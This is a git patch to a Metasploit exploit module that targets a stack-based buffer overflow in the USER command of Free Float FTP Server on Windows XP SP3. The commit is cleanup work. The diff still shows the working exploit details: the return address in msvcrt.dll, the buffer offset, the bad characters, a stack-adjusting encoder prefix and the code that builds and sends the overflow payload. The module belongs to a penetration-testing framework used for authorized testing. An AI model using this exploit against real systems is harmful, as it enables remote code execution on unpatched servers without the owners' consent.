From 4e8d32a89afbfbff8c0350088ae6980d88bf8410 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Tue, 16 Apr 2013 20:43:38 -0500
Subject: [PATCH] cleanup for freefloatftp_user

---
 .../exploits/windows/ftp/freefloatftp_user.rb | 19 +++++++++----------
 1 file changed, 9 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb
index aa172070d0..e5009b4cea 100644
--- a/modules/exploits/windows/ftp/freefloatftp_user.rb
+++ b/modules/exploits/windows/ftp/freefloatftp_user.rb
@@ -8,20 +8,19 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = LowRanking
+	Rank = NormalRanking
 
-	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Remote::Ftp
 
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'			 => 'Free Float FTP Server USER Command Buffer Overflow',
 			'Description'	 => %q{
-				Freefloat FTP Server is prone to an overflow condition. It
-			fails to properly sanitize user-supplied input resulting in a
-			stack-based buffer overflow. With a specially crafted 'USER'
-			command, a remote attacker can potentially have an unspecified
-			impact.
+					Freefloat FTP Server is prone to an overflow condition. It
+				fails to properly sanitize user-supplied input resulting in a
+				stack-based buffer overflow. With a specially crafted 'USER'
+				command, a remote attacker can potentially have an unspecified
+				impact.
 			},
 			'Platform'		 => 'win',
 			'Author'		 =>
@@ -38,14 +37,14 @@ class Metasploit4 < Msf::Exploit::Remote
 			'Privileged'	 => false,
 			'Payload'		 =>
 				{
-					'Space'          => 440,
+					'Space'          => 444,
 					'DisableNops'    => true,
 					'BadChars'       => "\x00\x0a\x0d",
 					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 				},
 			'Targets'		=>
 				[
-					[ 'Windows XP SP3',
+					[ 'FreeFloat / Windows XP SP3',
 						{
 							'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll
 							'Offset'   => 230
@@ -70,7 +69,7 @@ class Metasploit4 < Msf::Exploit::Remote
 		connect
 		buf = rand_text(target['Offset'])
 		buf << [ target['Ret'] ].pack('V')
-		buf << make_nops(12)
+		buf << rand_text(8)
 		buf << payload.encoded
 		send_user(buf)
 		disconnect